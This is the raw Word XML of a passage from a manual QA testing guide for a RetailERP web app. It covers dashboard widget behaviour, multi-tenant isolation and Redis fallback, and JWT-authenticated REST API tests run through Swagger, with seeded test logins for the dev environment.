      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Click the 'Unlock' button — it should change to a dark outline 'Lock' button.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. 'Add Widget' and 'Reset Layout' buttons should appear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Try dragging a widget by its header — it should move freely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Try resizing a widget from the bottom-right corner — it should resize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. The 'X' (remove) button should appear on each widget header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. Click 'Lock' again — all editing should be disabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   7. ✅ PASS if toggle works both ways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Drag &amp; Drop + Auto Save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm layout changes persist after refresh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-3A: Move Widget and Refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Unlock the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Drag a widget to a different position. Wait 2 seconds (auto-save debounce).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Refresh the page (F5 or Ctrl+R).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. The widget should be in the NEW position (not the default).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if layout persists after refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-3B: Resize Widget and Refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Unlock → resize a chart widget to take full width (12 columns).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Wait 2 seconds, then refresh the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. The widget should still be full width.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if size persists after refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Widget Picker Sidebar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm Add Widget sidebar works and adds widgets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-4A: Open Picker and Add Widget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Unlock the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Click 'Add Widget' — a sidebar should slide in from the right with a list of available widgets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Already-active widgets should be highlighted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Click a non-active widget — it should be added to the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. The sidebar should close and the new widget should appear at the top of the grid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. ✅ PASS if widget is added successfully</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Remove Widget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm X button removes widget and persists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-5A: Remove and Refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Unlock → click the X button on any widget.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Widget should disappear from the grid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Wait 2 seconds (auto-save), then refresh the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. The removed widget should not reappear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if widget stays removed after refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Reset to Default Layout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm Reset button restores default widget set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-6A: Reset After Customization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. After moving/removing/adding widgets, unlock and click 'Reset Layout'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Confirm the dialog prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Dashboard should reload with the default widget layout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. All previously removed widgets should reappear in default positions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if default layout is restored</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Per-Widget Refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm individual widget refresh button reloads data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-7A: Refresh Single Widget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Click the refresh icon (↻) on any KPI widget.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Widget should show spinner briefly, then re-populate with current data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Other widgets should NOT refresh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Also test 'Refresh All' button — all widgets should reload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if individual and bulk refresh work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Role-Based Widget Visibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm different roles see different widget sets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-8A: Admin vs Cashier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Log in as Admin — note the widget picker has ALL widgets (financial, inventory, POS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Log out → Log in as Cashier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Check widget picker — financial widgets (Purchases, Draft Invoices) should NOT appear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Cashier should see POS-focused widgets: POS Sales, Open Bills, Recent POS Bills, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if widget catalog differs by role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 3 — Testing Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Print this page, test each item, and mark Pass/Fail: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Test ID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Expected Result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3-1A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Default Layout Loads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KPI cards + charts + tables appear with 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3-2A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Locked State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Cannot drag/resize, edit buttons hidden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Unlocked State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Can drag/resize, edit buttons visible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3-3A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Move Persists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Moved widget stays after refresh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3-3B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Resize Persists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Resized widget stays after refresh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3-4A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Widget Picker Add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Sidebar opens, click adds widget to grid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3-5A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Remove Widget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X button removes, stays removed after refresh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3-6A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Reset Layout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Reset restores default widgets and positions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3-7A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Widget Refresh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Individual refresh + Refresh All work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3-8A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Role-Based Widgets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Admin sees all, Cashier sees POS-only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4 — Testing Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sprint 4 testing verifies multi-tenant isolation, SuperAdmin access, company management, and cache behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ensure the Sprint4_MultiTenant_Redis migration has been applied (dotnet ef database update). Redis is optional — if not running, the app falls back to in-memory distributed cache automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test Credentials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Password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SuperAdmin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retailerp.global@gmail.com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SuperAdmin@12345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 (tenant)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admin@retailerp.com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Admin@12345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Cashier (tenant)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cashier@retailerp.com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Cashier@12345</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-1: SuperAdmin Login &amp; Platform Sidebar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Log in as retailerp.global@gmail.com / SuperAdmin@12345.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Verify "Platform" section appears in sidebar with Companies and All Users links.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Click Companies — Index page loads with Default Company listed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-2: Company CRUD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Click Create New Company. Fill in details and save.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Edit the new company — change Name and toggle IsActive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>View Details — verify user count and store count cards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-3: Tenant Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Log in as admin@retailerp.com (tenant Admin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Verify "Platform" sidebar section is NOT visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Navigate to Items, Stores, Customers — only Default Company data is shown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Create a new Item. Verify it gets CompanyId = Default Company (check DB or SuperAdmin view).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-4: SuperAdmin Cross-Tenant Visibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Log back in as SuperAdmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Navigate to Items, Stores, Customers — all records from all companies are visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Use IgnoreQueryFilters in Details page to see cross-tenant counts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-5: Redis / Cache Fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Check application startup logs for 'Redis connected' or 'Redis unavailable, using in-memory' message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>If Redis is running, stop it and restart the app — verify graceful fallback to in-memory cache.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 4 — Testing Checklist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Test ID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Expected Result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4-1A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SuperAdmin Login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Login succeeds, Platform sidebar visible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4-1B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Companies Index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Default Company listed, search &amp; sort work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4-2A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Create Company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New company saved, appears in Index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Edit Company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Changes saved, IsActive toggles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4-2C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Company Details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User count &amp; store count display correctly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4-3A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Tenant Isolation (Admin)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Admin sees only Default Company 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4-3B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Auto-Stamp CompanyId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New records created by Admin get Default Company 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4-3C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Platform Sidebar Hidden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Non-SuperAdmin users don't see Platform section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4-4A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SuperAdmin Sees All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SuperAdmin sees all records across tenants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4-5A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Cache Behaviour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 starts with Redis or falls back gracefully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4-6A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 Backfill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pre-existing records have CompanyId = Default Company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5 — Testing Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sprint 5 testing verifies the REST API layer, JWT authentication, Swagger UI, and all CRUD endpoints. Run the app with: dotnet run  (from C:\7th_Semester\RetailERP) then open http://localhost:5082/swagger for interactive testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Test Credentials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Password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SuperAdmin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retailerp.global@gmail.com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SuperAdmin@12345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 (tenant)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admin@retailerp.com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Admin@12345</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Swagger UI Loads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm Swagger interactive docs are accessible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-1A: Open Swagger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Start the app: dotnet run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Open browser → http://localhost:5082/swagger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Swagger UI should load with all API endpoints grouped by controller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. You should see: Auth, Items, Categories, Units, Stores, Customers, Suppliers, Warehouses, Pos, Stocks, Reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if Swagger UI loads with all endpoints listed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. JWT Login &amp; Token Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm login returns valid JWT access + refresh tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-2A: Login via Swagger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. In Swagger, expand POST /api/v1/auth/login and click "Try it out".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Enter: {"email": "admin@retailerp.com", "password": "Admin@12345"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Click Execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Response should be 200 with: { success: true, data: { accessToken: "eyJ...", refreshToken: "...", expiresAtUtc: "..." } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Copy the accessToken value (without quotes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. ✅ PASS if you receive a valid JWT access token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-2B: Invalid Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. In Swagger, POST /api/v1/auth/login with wrong password: {"email": "admin@retailerp.com", "password": "wrong"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should be 401 with: { success: false, errors: ["Invalid email or password."] }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. ✅ PASS if 401 returned for bad credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. JWT Authorization on Protected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm JWT token grants access to protected API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-3A: Authorize in Swagger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Click the "Authorize" button (🔒) at the top of Swagger UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. In the Value field, paste: Bearer &lt;your-access-token-from-2A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Click Authorize, then Close.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Now expand GET /api/v1/auth/me and click Try it out → Execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Response should be 200 with your user profile (userId, email, displayName, companyId, roles).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. ✅ PASS if /me returns user profile with correct companyId and roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-3B: Request Without Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Click Authorize → Logout (remove the token).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Try GET /api/v1/items → Execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Response should be 401 Unauthorized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if 401 returned without JWT token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Master Data CRUD APIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm all CRUD endpoints work correctly with pagination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-4A: List Items with Pagination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Re-authorize with your JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. GET /api/v1/items?page=1&amp;pageSize=3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Response should return a PagedResponse with: data (array of 3 items), page=1, pageSize=3, totalCount, totalPages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Verify items have: itemId, sku, name, unitPrice, categoryName, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if paginated response with correct structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-4B: Search Items</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. GET /api/v1/items?search=rice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should return only items whose name, SKU, or barcode contains "rice".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. ✅ PASS if search filters results correctly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-4C: Create and Update Item</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. POST /api/v1/items with body: {"sku": "API-001", "name": "API Test Item", "unitPrice": 99.99, "reorderLevel": 10}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should be 201 Created with the new item data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Copy the itemId from the response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. PUT /api/v1/items/{itemId} with updated name: {"sku": "API-001", "name": "API Updated Item", "unitPrice": 149.99, "reorderLevel": 5, "isActive": true}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Response should be 200 with "Item updated."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. GET /api/v1/items/{itemId} — verify the name and price are updated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   7. ✅ PASS if create, update, and get-by-id all work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-4D: Test Other CRUD Controllers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Repeat similar CRUD tests for: Categories, Units, Stores, Customers, Suppliers, Warehouses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Verify each supports: GET (list + pagination), GET by ID, POST (create), PUT (update), DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. ✅ PASS if all 7 master data controllers work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. POS Bills API (Read-Only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm POS bills are accessible via API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-5A: List Bills</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. GET /api/v1/pos/bills?page=1&amp;pageSize=5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should list POS bills with: billNo, billDate, storeName, grandTotal, status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. ✅ PASS if bills listed with correct data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-5B: Bill Detail with Lines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Copy a posBillId from the list response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. GET /api/v1/pos/bills/{posBillId}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Response should include bill header + lines array with itemName, qty, unitPrice, lineTotal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if bill detail includes line items</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Stocks API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm stock levels and adjustment work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-6A: View Stock Levels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. GET /api/v1/stocks?page=1&amp;pageSize=10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should list stock records with: itemName, SKU, warehouseName, quantity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. ✅ PASS if stock levels returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-6B: Adjust Stock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Note the current quantity of a stock record.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. POST /api/v1/stocks/adjust with: {"itemId": "&lt;itemId&gt;", "warehouseId": "&lt;warehouseId&gt;", "adjustmentQty": 10, "reason": "API test"}</w:t>
      </w:r>
    </w:p>
